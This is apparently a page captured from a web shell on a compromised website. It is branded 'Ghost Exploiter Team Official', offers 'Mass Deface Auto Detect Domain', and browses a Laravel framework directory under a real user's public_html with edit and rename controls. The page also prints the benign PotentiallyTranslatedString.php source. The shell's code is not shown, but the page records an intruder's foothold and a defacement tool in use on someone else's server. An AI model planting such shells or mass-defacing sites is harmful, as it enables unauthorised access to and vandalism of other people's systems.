webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Translation
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
lang
--
ren
ArrayLoader.php
1.577KB
edt
ren
CreatesPotentiallyTrans
...
1.602KB
edt
ren
FileLoader.php
5.041KB
edt
ren
LICENSE.md
1.05KB
edt
ren
MessageSelector.php
11.397KB
edt
ren
PotentiallyTranslatedSt
...
2.022KB
edt
ren
TranslationServiceProvi
...
1.42KB
edt
ren
Translator.php
14.536KB
edt
ren
composer.json
0.937KB
edt
ren
<?php namespace Illuminate\Translation; use Stringable; class PotentiallyTranslatedString implements Stringable { /** * The string that may be translated. * * @var string */ protected $string; /** * The translated string. * * @var string|null */ protected $translation; /** * The validator that may perform the translation. * * @var \Illuminate\Contracts\Translation\Translator */ protected $translator; /** * Create a new potentially translated string. * * @param string $string * @param \Illuminate\Contracts\Translation\Translator $translator */ public function __construct($string, $translator) { $this->string = $string; $this->translator = $translator; } /** * Translate the string. * * @param array $replace * @param string|null $locale * @return $this */ public function translate($replace = [], $locale = null) { $this->translation = $this->translator->get($this->string, $replace, $locale); return $this; } /** * Translates the string based on a count. * * @param \Countable|int|float|array $number * @param array $replace * @param string|null $locale * @return $this */ public function translateChoice($number, array $replace = [], $locale = null) { $this->translation = $this->translator->choice($this->string, $number, $replace, $locale); return $this; } /** * Get the original string. * * @return string */ public function original() { return $this->string; } /** * Get the potentially translated string. * * @return string */ public function __toString() { return $this->translation ?? $this->string; } /** * Get the potentially translated string. * * @return string */ public function toString() { return (string) $this; } }
<=Back
Liking